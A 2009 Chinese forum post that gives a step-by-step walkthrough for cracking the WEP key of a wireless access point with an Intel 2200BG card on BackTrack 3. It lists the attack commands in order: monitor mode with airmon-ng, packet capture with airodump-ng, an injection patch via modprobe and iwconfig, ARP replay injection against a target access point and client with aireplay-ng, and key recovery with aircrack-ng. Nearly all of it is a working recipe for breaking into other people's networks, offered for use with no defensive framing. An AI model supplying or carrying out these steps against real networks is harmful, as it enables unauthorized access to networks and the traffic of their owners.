上等兵
- 注册时间
- 2007-9-25
- 金币
- 93 个
- 威望
- 0 个
- 荣誉
- 0 个
尚未签到
|
笔者研究了各种用Intel 2200BG破解wep的方法,近期终于活动突破性进展。不敢独享,遂发帖,和各位兄弟共同学习之。
1.装备: dell D410笔记本、内置Intel2200BG无线网卡,bt3中文u盘。
2.启动BT3,打开一个窗口,输入ifconfig –a 查看网卡(顺便记下自己网卡的端口名,一般为eth1)
3.输入airmon-ng start eth1 激活网卡的Monitor模式
4.输入抓包命令,抓包并查看你要破解的ap的mac和与之相连的客户端mac。
输入命令
airodump-ng --ivs -w name –c 6 eth1
其中, -w 后面跟的name 是名字的意思,这么名字是你随便取的,我一般偷懒,直接用,-c 后面跟的6是ap的工作频道,假如你要破解的ap工作频道是2,你就换成2,eth1是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的ap的essid 和mac 和与之相连接的客户端的mac。
5.上面窗口不关闭,另开一个窗口,输入命令
modprobe ipw2200 rtap_iface=1 回车
再输入
iwconfig eth1 ap 其中,ap后面跟你要破解的ap的mac,值得注意的是,这个mac必须输入中间的“:”。(如图)
回车后,输入
iwconfig eth1 key s:fakekey 回车,如果输入准确无误,你已经成功的为2200打上了注入补丁,后面就可以用常规方式进行注入、破解了。
6.输入aireplay-ng -3 -b ap的mac - h 客户端网卡的mac eth1 进行注入。 快的一分钟,慢的5分钟,即可成功注入。
到数据增加到1万以上时,另开窗口,启动
aircrack-ng -n 64 name-01.ivs 进行破解。
其中,name 是名字的意思,这么名字是你随便取的,我一般偷懒,直接用1,得到的ivs文件就是1-01.ivs 、1-02.ivs …… 用2,则为2-01.ivs 、2-02.ivs …… 依此类推。 你最好输入ls命令,看一下,你的内存里有几个这样的文件,一般以序号靠后的为准。 最懒最安全的办法是,直接用*.ivs,所有的ivs文件一网打尽。
64 代表64位密码,如果是128位,换成128,依此类推,即可实现破解。 |
|
IP卡
狗仔卡
发表于 2009-1-8 20:51
显身卡